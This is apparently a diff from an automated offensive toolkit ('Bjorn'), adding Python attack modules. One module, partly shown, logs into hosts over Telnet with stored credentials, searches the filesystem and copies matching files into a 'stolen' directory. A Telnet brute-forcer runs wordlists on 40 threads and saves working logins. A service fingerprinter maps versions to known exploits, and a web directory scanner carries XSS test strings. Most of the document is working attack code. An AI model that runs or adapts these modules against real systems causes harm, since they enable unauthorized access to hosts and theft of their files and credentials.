|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
||||
|
||||
def hostname_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# -------- Creds --------
|
||||
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
|
||||
mac = self.mac_for_ip(ip)
|
||||
params = {"ip": ip, "port": port, "mac": mac or ""}
|
||||
|
||||
by_ip = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user","password"
|
||||
FROM creds
|
||||
WHERE service='telnet'
|
||||
AND COALESCE(ip,'')=:ip
|
||||
AND (port IS NULL OR port=:port)
|
||||
""", params)
|
||||
|
||||
by_mac = []
|
||||
if mac:
|
||||
by_mac = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user","password"
|
||||
FROM creds
|
||||
WHERE service='telnet'
|
||||
AND COALESCE(mac_address,'')=:mac
|
||||
AND (port IS NULL OR port=:port)
|
||||
""", params)
|
||||
|
||||
seen, out = set(), []
|
||||
for row in (by_ip + by_mac):
|
||||
u = str(row.get("user") or "").strip()
|
||||
p = str(row.get("password") or "").strip()
|
||||
if not u or (u, p) in seen:
|
||||
continue
|
||||
seen.add((u, p))
|
||||
out.append((u, p))
|
||||
return out
|
||||
|
||||
# -------- Telnet helpers --------
|
||||
def connect_telnet(self, ip: str, username: str, password: str) -> Optional[telnetlib.Telnet]:
|
||||
try:
|
||||
tn = telnetlib.Telnet(ip, b_port, timeout=10)
|
||||
tn.read_until(b"login: ", timeout=5)
|
||||
tn.write(username.encode('ascii') + b"\n")
|
||||
if password:
|
||||
tn.read_until(b"Password: ", timeout=5)
|
||||
tn.write(password.encode('ascii') + b"\n")
|
||||
            # prompt detection (naive, but identical to the original logic)
|
||||
time.sleep(2)
|
||||
self.telnet_connected = True
|
||||
logger.info(f"Connected to {ip} via Telnet as {username}")
|
||||
return tn
|
||||
except Exception as e:
|
||||
logger.error(f"Telnet connect error {ip} {username}: {e}")
|
||||
return None
|
||||
|
||||
def find_files(self, tn: telnetlib.Telnet, dir_path: str) -> List[str]:
|
||||
try:
|
||||
if self.shared_data.orchestrator_should_exit or self.stop_execution:
|
||||
logger.info("File search interrupted.")
|
||||
return []
|
||||
tn.write(f'find {dir_path} -type f\n'.encode('ascii'))
|
||||
out = tn.read_until(b"$", timeout=10).decode('ascii', errors='ignore')
|
||||
files = out.splitlines()
|
||||
matches = []
|
||||
for f in files:
|
||||
if self.shared_data.orchestrator_should_exit or self.stop_execution:
|
||||
logger.info("File search interrupted.")
|
||||
return []
|
||||
fname = os.path.basename(f.strip())
|
||||
if (self.shared_data.steal_file_extensions and any(fname.endswith(ext) for ext in self.shared_data.steal_file_extensions)) or \
|
||||
(self.shared_data.steal_file_names and any(sn in fname for sn in self.shared_data.steal_file_names)):
|
||||
matches.append(f.strip())
|
||||
logger.info(f"Found {len(matches)} matching files under {dir_path}")
|
||||
return matches
|
||||
except Exception as e:
|
||||
logger.error(f"Telnet find error: {e}")
|
||||
return []
|
||||
|
||||
def steal_file(self, tn: telnetlib.Telnet, remote_file: str, base_dir: str) -> None:
|
||||
try:
|
||||
if self.shared_data.orchestrator_should_exit or self.stop_execution:
|
||||
logger.info("Steal interrupted.")
|
||||
return
|
||||
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
|
||||
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
|
||||
with open(local_file_path, 'wb') as f:
|
||||
tn.write(f'cat {remote_file}\n'.encode('ascii'))
|
||||
f.write(tn.read_until(b"$", timeout=10))
|
||||
logger.success(f"Downloaded {remote_file} -> {local_file_path}")
|
||||
except Exception as e:
|
||||
logger.error(f"Telnet download error {remote_file}: {e}")
|
||||
|
||||
# -------- Orchestrator entry --------
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
port_i = b_port
|
||||
|
||||
creds = self._get_creds_for_target(ip, port_i)
|
||||
logger.info(f"Found {len(creds)} Telnet credentials in DB for {ip}")
|
||||
if not creds:
|
||||
logger.error(f"No Telnet credentials for {ip}. Skipping.")
|
||||
return 'failed'
|
||||
|
||||
def _timeout():
|
||||
if not self.telnet_connected:
|
||||
logger.error(f"No Telnet connection within 4 minutes for {ip}. Failing.")
|
||||
self.stop_execution = True
|
||||
|
||||
timer = Timer(240, _timeout)
|
||||
timer.start()
|
||||
|
||||
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
|
||||
base_dir = os.path.join(self.shared_data.data_stolen_dir, f"telnet/{mac}_{ip}")
|
||||
|
||||
success = False
|
||||
for username, password in creds:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
try:
|
||||
tn = self.connect_telnet(ip, username, password)
|
||||
if not tn:
|
||||
continue
|
||||
files = self.find_files(tn, '/')
|
||||
if files:
|
||||
for remote in files:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
self.steal_file(tn, remote, base_dir)
|
||||
logger.success(f"Stole {len(files)} files from {ip} as {username}")
|
||||
success = True
|
||||
try:
|
||||
tn.close()
|
||||
except Exception:
|
||||
pass
|
||||
if success:
|
||||
timer.cancel()
|
||||
return 'success'
|
||||
except Exception as e:
|
||||
logger.error(f"Telnet loot error {ip} {username}: {e}")
|
||||
|
||||
timer.cancel()
|
||||
return 'success' if success else 'failed'
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
272
resources/default_config/actions/telnet_bruteforce.py
Normal file
@@ -0,0 +1,272 @@
|
||||
"""
|
||||
telnet_bruteforce.py — Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
- Targets: (ip, port) provided by the orchestrator
- IP -> (MAC, hostname) via DB.hosts
- Successes -> DB.creds (service='telnet')
- Keeps the original logic (telnetlib, queue/threads)
|
||||
"""
|
||||
|
||||
import os
|
||||
import telnetlib
|
||||
import threading
|
||||
import logging
|
||||
import time
|
||||
from queue import Queue
|
||||
from typing import List, Dict, Tuple, Optional
|
||||
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="telnet_bruteforce.py", level=logging.DEBUG)
|
||||
|
||||
b_class = "TelnetBruteforce"
|
||||
b_module = "telnet_bruteforce"
|
||||
b_status = "brute_force_telnet"
|
||||
b_port = 23
|
||||
b_parent = None
|
||||
b_service = '["telnet"]'
|
||||
b_trigger = 'on_any:["on_service:telnet","on_new_port:23"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 minutes between two runs
b_rate_limit = '3/86400' # at most 3 runs per day
|
||||
|
||||
class TelnetBruteforce:
|
||||
"""Wrapper orchestrateur -> TelnetConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
self.telnet_bruteforce = TelnetConnector(shared_data)
|
||||
logger.info("TelnetConnector initialized.")
|
||||
|
||||
def bruteforce_telnet(self, ip, port):
|
||||
"""Lance le bruteforce Telnet pour (ip, port)."""
|
||||
return self.telnet_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d’entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
logger.info(f"Executing TelnetBruteforce on {ip}:{port}")
|
||||
self.shared_data.bjorn_orch_status = "TelnetBruteforce"
|
||||
success, results = self.bruteforce_telnet(ip, port)
|
||||
return 'success' if success else 'failed'
|
||||
|
||||
|
||||
class TelnetConnector:
|
||||
"""Gère les tentatives Telnet, persistance DB, mapping IP→(MAC, Hostname)."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
        # Wordlists (unchanged from the original)
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
# Cache IP -> (mac, hostname)
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
|
||||
self.lock = threading.Lock()
|
||||
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
|
||||
self.queue = Queue()
|
||||
|
||||
    # ---------- file utils ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
with open(path, "r", encoding="utf-8", errors="ignore") as f:
|
||||
return [l.rstrip("\n\r") for l in f if l.strip()]
|
||||
except Exception as e:
|
||||
logger.error(f"Cannot read file {path}: {e}")
|
||||
return []
|
||||
|
||||
# ---------- mapping DB hosts ----------
|
||||
def _refresh_ip_identity_cache(self) -> None:
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
||||
|
||||
def hostname_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# ---------- Telnet ----------
|
||||
def telnet_connect(self, adresse_ip: str, user: str, password: str) -> bool:
|
||||
try:
|
||||
            tn = telnetlib.Telnet(adresse_ip, b_port, timeout=10)  # bound the connect so a dead host cannot hang the worker
|
||||
tn.read_until(b"login: ", timeout=5)
|
||||
tn.write(user.encode('ascii') + b"\n")
|
||||
if password:
|
||||
tn.read_until(b"Password: ", timeout=5)
|
||||
tn.write(password.encode('ascii') + b"\n")
|
||||
time.sleep(2)
|
||||
response = tn.expect([b"Login incorrect", b"Password: ", b"$ ", b"# "], timeout=5)
|
||||
try:
|
||||
tn.close()
|
||||
except Exception:
|
||||
pass
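            # tn.expect() returns (match_index, match_object, data_read);
            # index 2 ('$ ') or 3 ('# ') means a shell prompt was reached,
            # i.e. the credentials are considered valid.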
|
||||
if response[0] == 2 or response[0] == 3:
|
||||
return True
|
||||
except Exception:
|
||||
pass
|
||||
return False
|
||||
|
||||
# ---------- DB upsert fallback ----------
|
||||
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
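        # Upsert emulated without an ON CONFLICT clause: INSERT OR IGNORE
        # creates the row when it is missing, then the keyed UPDATE refreshes
        # password/hostname/last_seen whether the row was new or not.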
|
||||
mac_k = mac or ""
|
||||
ip_k = ip or ""
|
||||
user_k = user or ""
|
||||
db_k = database or ""
|
||||
port_k = int(port or 0)
|
||||
|
||||
try:
|
||||
with self.shared_data.db.transaction(immediate=True):
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
|
||||
VALUES('telnet',?,?,?,?,?,?,?,NULL)
|
||||
""",
|
||||
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
|
||||
)
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
UPDATE creds
|
||||
SET "password"=?,
|
||||
hostname=COALESCE(?, hostname),
|
||||
last_seen=CURRENT_TIMESTAMP
|
||||
WHERE service='telnet'
|
||||
AND COALESCE(mac_address,'')=?
|
||||
AND COALESCE(ip,'')=?
|
||||
AND COALESCE("user",'')=?
|
||||
AND COALESCE(COALESCE("database",""),'')=?
|
||||
AND COALESCE(port,0)=?
|
||||
""",
|
||||
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
|
||||
)
|
||||
except Exception as e:
|
||||
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
|
||||
|
||||
# ---------- worker / queue ----------
|
||||
def worker(self, success_flag):
|
||||
"""Worker thread for Telnet bruteforce attempts."""
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping worker thread.")
|
||||
break
|
||||
|
||||
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
|
||||
try:
|
||||
if self.telnet_connect(adresse_ip, user, password):
|
||||
with self.lock:
|
||||
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
|
||||
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
|
||||
self.save_results()
|
||||
self.removeduplicates()
|
||||
success_flag[0] = True
|
||||
finally:
|
||||
self.queue.task_done()
|
||||
|
||||
# Optional delay between attempts
|
||||
if getattr(self.shared_data, "timewait_telnet", 0) > 0:
|
||||
time.sleep(self.shared_data.timewait_telnet)
|
||||
|
||||
|
||||
def run_bruteforce(self, adresse_ip: str, port: int):
|
||||
mac_address = self.mac_for_ip(adresse_ip)
|
||||
hostname = self.hostname_for_ip(adresse_ip) or ""
|
||||
|
||||
total_tasks = len(self.users) * len(self.passwords)
|
||||
if total_tasks == 0:
|
||||
logger.warning("No users/passwords loaded. Abort.")
|
||||
return False, []
|
||||
|
||||
for user in self.users:
|
||||
for password in self.passwords:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
|
||||
return False, []
|
||||
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
|
||||
|
||||
success_flag = [False]
|
||||
threads = []
|
||||
thread_count = min(40, max(1, total_tasks))
|
||||
|
||||
for _ in range(thread_count):
|
||||
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
|
||||
t.start()
|
||||
threads.append(t)
|
||||
|
||||
        while not self.queue.empty():
            if self.shared_data.orchestrator_should_exit:
                logger.info("Orchestrator exit signal received, stopping bruteforce.")
                while not self.queue.empty():
                    try:
                        self.queue.get_nowait()
                        self.queue.task_done()
                    except Exception:
                        break
                break
            time.sleep(0.1)  # avoid busy-spinning while worker threads drain the queue
|
||||
|
||||
self.queue.join()
|
||||
for t in threads:
|
||||
t.join()
|
||||
|
||||
return success_flag[0], self.results
|
||||
|
||||
    # ---------- DB persistence ----------
|
||||
def save_results(self):
|
||||
for mac, ip, hostname, user, password, port in self.results:
|
||||
try:
|
||||
self.shared_data.db.insert_cred(
|
||||
service="telnet",
|
||||
mac=mac,
|
||||
ip=ip,
|
||||
hostname=hostname,
|
||||
user=user,
|
||||
password=password,
|
||||
port=port,
|
||||
database=None,
|
||||
extra=None
|
||||
)
|
||||
except Exception as e:
|
||||
if "ON CONFLICT clause does not match" in str(e):
|
||||
self._fallback_upsert_cred(
|
||||
mac=mac, ip=ip, hostname=hostname, user=user,
|
||||
password=password, port=port, database=None
|
||||
)
|
||||
else:
|
||||
logger.error(f"insert_cred failed for {ip} {user}: {e}")
|
||||
self.results = []
|
||||
|
||||
    def removeduplicates(self):
        # No-op: deduplication is handled by the DB layer (INSERT OR IGNORE + keyed UPDATE).
        pass
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
sd = SharedData()
|
||||
telnet_bruteforce = TelnetBruteforce(sd)
|
||||
logger.info("Telnet brute force module ready.")
|
||||
exit(0)
|
||||
except Exception as e:
|
||||
logger.error(f"Error: {e}")
|
||||
exit(1)
|
||||
214
resources/default_config/actions/thor_hammer.py
Normal file
@@ -0,0 +1,214 @@
|
||||
# Service fingerprinting and version detection tool for vulnerability identification.
|
||||
# Saves settings in `/home/bjorn/.settings_bjorn/thor_hammer_settings.json`.
|
||||
# Automatically loads saved settings if arguments are not provided.
|
||||
# -t, --target Target IP or hostname to scan (overrides saved value).
|
||||
# -p, --ports Ports to scan (default: common ports, comma-separated).
|
||||
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/services).
|
||||
# -d, --delay Delay between probes in seconds (default: 1).
|
||||
# -v, --verbose Enable verbose output for detailed service information.
|
||||
|
||||
import os
|
||||
import json
|
||||
import socket
|
||||
import argparse
|
||||
import threading
|
||||
from datetime import datetime
|
||||
import logging
|
||||
from concurrent.futures import ThreadPoolExecutor
|
||||
import subprocess
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
b_class = "ThorHammer"
|
||||
b_module = "thor_hammer"
|
||||
b_enabled = 0
|
||||
|
||||
# Configure logging
|
||||
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
|
||||
|
||||
# Default settings
|
||||
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/services"
|
||||
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
|
||||
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "thor_hammer_settings.json")
|
||||
DEFAULT_PORTS = [21, 22, 23, 25, 53, 80, 110, 115, 139, 143, 194, 443, 445, 1433, 3306, 3389, 5432, 5900, 8080]
|
||||
|
||||
# Service signature database
|
||||
SERVICE_SIGNATURES = {
|
||||
21: {
|
||||
'name': 'FTP',
|
||||
'vulnerabilities': {
|
||||
'vsftpd 2.3.4': 'Backdoor command execution',
|
||||
'ProFTPD 1.3.3c': 'Remote code execution'
|
||||
}
|
||||
},
|
||||
22: {
|
||||
'name': 'SSH',
|
||||
'vulnerabilities': {
|
||||
'OpenSSH 5.3': 'Username enumeration',
|
||||
'OpenSSH 7.2p1': 'User enumeration timing attack'
|
||||
}
|
||||
},
|
||||
# Add more signatures as needed
|
||||
}
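# Illustrative example of how probe_service matches these signatures (the
# version string below is made up):
#
#   sig = SERVICE_SIGNATURES[21]
#   version = "vsftpd 2.3.4"
#   hits = [desc for ver, desc in sig['vulnerabilities'].items()
#           if ver.lower() in version.lower()]
#   # hits == ['Backdoor command execution']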
|
||||
|
||||
class ThorHammer:
|
||||
def __init__(self, target, ports=None, output_dir=DEFAULT_OUTPUT_DIR, delay=1, verbose=False):
|
||||
self.target = target
|
||||
self.ports = ports or DEFAULT_PORTS
|
||||
self.output_dir = output_dir
|
||||
self.delay = delay
|
||||
self.verbose = verbose
|
||||
self.results = {
|
||||
'target': target,
|
||||
'timestamp': datetime.now().isoformat(),
|
||||
'services': {}
|
||||
}
|
||||
self.lock = threading.Lock()
|
||||
|
||||
def probe_service(self, port):
|
||||
"""Probe a specific port for service information."""
|
||||
try:
|
||||
# Initial connection test
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sock.settimeout(self.delay)
|
||||
result = sock.connect_ex((self.target, port))
|
||||
|
||||
if result == 0:
|
||||
service_info = {
|
||||
'port': port,
|
||||
'state': 'open',
|
||||
'service': None,
|
||||
'version': None,
|
||||
'vulnerabilities': []
|
||||
}
|
||||
|
||||
# Get service banner
|
||||
try:
|
||||
banner = sock.recv(1024).decode('utf-8', errors='ignore').strip()
|
||||
service_info['banner'] = banner
|
||||
                except Exception:
|
||||
service_info['banner'] = None
|
||||
|
||||
# Advanced service detection using nmap if available
|
||||
try:
|
||||
nmap_output = subprocess.check_output(
|
||||
['nmap', '-sV', '-p', str(port), '-T4', self.target],
|
||||
stderr=subprocess.DEVNULL
|
||||
).decode()
|
||||
|
||||
# Parse nmap output
|
||||
for line in nmap_output.split('\n'):
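                        # NOTE: matching str(port) as a substring is a loose
                        # heuristic; it works here because '-p' restricts nmap
                        # to a single port, but anchoring on f"{port}/tcp"
                        # would be stricter.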
|
||||
if str(port) in line and 'open' in line:
|
||||
service_info['service'] = line.split()[2]
|
||||
if len(line.split()) > 3:
|
||||
service_info['version'] = ' '.join(line.split()[3:])
|
||||
                except Exception:
|
||||
pass
|
||||
|
||||
# Check for known vulnerabilities
|
||||
if port in SERVICE_SIGNATURES:
|
||||
sig = SERVICE_SIGNATURES[port]
|
||||
service_info['service'] = service_info['service'] or sig['name']
|
||||
if service_info['version']:
|
||||
for vuln_version, vuln_desc in sig['vulnerabilities'].items():
|
||||
if vuln_version.lower() in service_info['version'].lower():
|
||||
service_info['vulnerabilities'].append({
|
||||
'version': vuln_version,
|
||||
'description': vuln_desc
|
||||
})
|
||||
|
||||
with self.lock:
|
||||
self.results['services'][port] = service_info
|
||||
if self.verbose:
|
||||
logging.info(f"Service detected on port {port}: {service_info['service']}")
|
||||
|
||||
                sock.close()
            else:
                sock.close()  # also release the socket when the port is closed/filtered
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error probing port {port}: {e}")
|
||||
|
||||
def save_results(self):
|
||||
"""Save scan results to a JSON file."""
|
||||
try:
|
||||
os.makedirs(self.output_dir, exist_ok=True)
|
||||
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
|
||||
filename = os.path.join(self.output_dir, f"service_scan_{timestamp}.json")
|
||||
|
||||
with open(filename, 'w') as f:
|
||||
json.dump(self.results, f, indent=4)
|
||||
logging.info(f"Results saved to {filename}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save results: {e}")
|
||||
|
||||
def execute(self):
|
||||
"""Execute the service scanning and fingerprinting process."""
|
||||
logging.info(f"Starting service scan on {self.target}")
|
||||
|
||||
with ThreadPoolExecutor(max_workers=10) as executor:
|
||||
executor.map(self.probe_service, self.ports)
|
||||
|
||||
self.save_results()
|
||||
return self.results
|
||||
|
||||
def save_settings(target, ports, output_dir, delay, verbose):
|
||||
"""Save settings to JSON file."""
|
||||
try:
|
||||
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
|
||||
settings = {
|
||||
"target": target,
|
||||
"ports": ports,
|
||||
"output_dir": output_dir,
|
||||
"delay": delay,
|
||||
"verbose": verbose
|
||||
}
|
||||
with open(SETTINGS_FILE, 'w') as f:
|
||||
json.dump(settings, f)
|
||||
logging.info(f"Settings saved to {SETTINGS_FILE}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save settings: {e}")
|
||||
|
||||
def load_settings():
|
||||
"""Load settings from JSON file."""
|
||||
if os.path.exists(SETTINGS_FILE):
|
||||
try:
|
||||
with open(SETTINGS_FILE, 'r') as f:
|
||||
return json.load(f)
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to load settings: {e}")
|
||||
return {}
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Service fingerprinting and vulnerability detection tool")
|
||||
parser.add_argument("-t", "--target", help="Target IP or hostname")
|
||||
parser.add_argument("-p", "--ports", help="Ports to scan (comma-separated)")
|
||||
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
|
||||
parser.add_argument("-d", "--delay", type=float, default=1, help="Delay between probes")
|
||||
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
|
||||
args = parser.parse_args()
|
||||
|
||||
settings = load_settings()
|
||||
target = args.target or settings.get("target")
|
||||
    ports = [int(p.strip()) for p in args.ports.split(',')] if args.ports else settings.get("ports", DEFAULT_PORTS)
|
||||
    # Hard-coded argparse defaults would always win over saved settings, so fall
    # back explicitly: CLI value -> saved setting -> built-in default.
    output_dir = args.output or settings.get("output_dir") or DEFAULT_OUTPUT_DIR
    delay = args.delay if args.delay is not None else settings.get("delay", 1)
    verbose = args.verbose or settings.get("verbose", False)
|
||||
|
||||
if not target:
|
||||
logging.error("Target is required. Use -t or save it in settings")
|
||||
return
|
||||
|
||||
save_settings(target, ports, output_dir, delay, verbose)
|
||||
|
||||
scanner = ThorHammer(
|
||||
target=target,
|
||||
ports=ports,
|
||||
output_dir=output_dir,
|
||||
delay=delay,
|
||||
verbose=verbose
|
||||
)
|
||||
scanner.execute()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
313
resources/default_config/actions/valkyrie_scout.py
Normal file
@@ -0,0 +1,313 @@
|
||||
# Web application scanner for discovering hidden paths and vulnerabilities.
|
||||
# Saves settings in `/home/bjorn/.settings_bjorn/valkyrie_scout_settings.json`.
|
||||
# Automatically loads saved settings if arguments are not provided.
|
||||
# -u, --url Target URL to scan (overrides saved value).
|
||||
# -w, --wordlist Path to directory wordlist (default: built-in list).
|
||||
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/webscan).
|
||||
# -t, --threads Number of concurrent threads (default: 10).
|
||||
# -d, --delay Delay between requests in seconds (default: 0.1).
|
||||
|
||||
import os
|
||||
import json
|
||||
import requests
|
||||
import argparse
|
||||
from datetime import datetime
|
||||
import logging
import time
|
||||
import threading
|
||||
from concurrent.futures import ThreadPoolExecutor
|
||||
from urllib.parse import urljoin
|
||||
import re
|
||||
from bs4 import BeautifulSoup
|
||||
|
||||
|
||||
b_class = "ValkyrieScout"
|
||||
b_module = "valkyrie_scout"
|
||||
b_enabled = 0
|
||||
|
||||
# Configure logging
|
||||
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
|
||||
|
||||
# Default settings
|
||||
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/webscan"
|
||||
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
|
||||
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "valkyrie_scout_settings.json")
|
||||
|
||||
# Common web vulnerabilities to check
|
||||
VULNERABILITY_PATTERNS = {
|
||||
'sql_injection': [
|
||||
"error in your SQL syntax",
|
||||
"mysql_fetch_array",
|
||||
"ORA-",
|
||||
"PostgreSQL",
|
||||
],
|
||||
'xss': [
|
||||
"<script>alert(1)</script>",
|
||||
"javascript:alert(1)",
|
||||
],
|
||||
'lfi': [
|
||||
"include(",
|
||||
"require(",
|
||||
"include_once(",
|
||||
"require_once(",
|
||||
]
|
||||
}
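# NOTE: these are passive indicators — the XSS/SQL strings only match content a
# page already returns; this scanner does not inject any payloads itself.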
|
||||
|
||||
class ValkyrieScout:
|
||||
def __init__(self, url, wordlist=None, output_dir=DEFAULT_OUTPUT_DIR, threads=10, delay=0.1):
|
||||
self.base_url = url.rstrip('/')
|
||||
self.wordlist = wordlist
|
||||
self.output_dir = output_dir
|
||||
self.threads = threads
|
||||
self.delay = delay
|
||||
|
||||
        self.discovered_paths = []  # list of dicts (dicts are unhashable, so a set would raise TypeError)
|
||||
self.vulnerabilities = []
|
||||
self.forms = []
|
||||
|
||||
self.session = requests.Session()
|
||||
self.session.headers = {
|
||||
'User-Agent': 'Valkyrie Scout Web Scanner',
|
||||
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
}
|
||||
|
||||
self.lock = threading.Lock()
|
||||
|
||||
def load_wordlist(self):
|
||||
"""Load directory wordlist."""
|
||||
if self.wordlist and os.path.exists(self.wordlist):
|
||||
with open(self.wordlist, 'r') as f:
|
||||
return [line.strip() for line in f if line.strip()]
|
||||
return [
|
||||
'admin', 'wp-admin', 'administrator', 'login', 'wp-login.php',
|
||||
'upload', 'uploads', 'backup', 'backups', 'config', 'configuration',
|
||||
'dev', 'development', 'test', 'testing', 'staging', 'prod',
|
||||
'api', 'v1', 'v2', 'beta', 'debug', 'console', 'phpmyadmin',
|
||||
'mysql', 'database', 'db', 'wp-content', 'includes', 'tmp', 'temp'
|
||||
]
|
||||
|
||||
def scan_path(self, path):
|
||||
"""Scan a single path for existence and vulnerabilities."""
|
||||
url = urljoin(self.base_url, path)
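        # NOTE: urljoin replaces the last path segment of a base URL, so
        # "http://host/app" joined with "admin" yields "http://host/admin";
        # with a bare "http://host" base (the common case here) this is fine.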
|
||||
try:
|
||||
            time.sleep(self.delay)  # honor the configured inter-request delay
            response = self.session.get(url, allow_redirects=False, timeout=10)
|
||||
|
||||
if response.status_code in [200, 301, 302, 403]:
|
||||
with self.lock:
|
||||
                    self.discovered_paths.append({
|
||||
'path': path,
|
||||
'url': url,
|
||||
'status_code': response.status_code,
|
||||
'content_length': len(response.content),
|
||||
'timestamp': datetime.now().isoformat()
|
||||
})
|
||||
|
||||
# Scan for vulnerabilities
|
||||
self.check_vulnerabilities(url, response)
|
||||
|
||||
# Extract and analyze forms
|
||||
self.analyze_forms(url, response)
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error scanning {url}: {e}")
|
||||
|
||||
def check_vulnerabilities(self, url, response):
|
||||
"""Check for common vulnerabilities in the response."""
|
||||
try:
|
||||
content = response.text.lower()
|
||||
|
||||
for vuln_type, patterns in VULNERABILITY_PATTERNS.items():
|
||||
for pattern in patterns:
|
||||
if pattern.lower() in content:
|
||||
with self.lock:
|
||||
self.vulnerabilities.append({
|
||||
'type': vuln_type,
|
||||
'url': url,
|
||||
'pattern': pattern,
|
||||
'timestamp': datetime.now().isoformat()
|
||||
})
|
||||
|
||||
# Additional checks
|
||||
self.check_security_headers(url, response)
|
||||
self.check_information_disclosure(url, response)
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error checking vulnerabilities for {url}: {e}")
|
||||
|
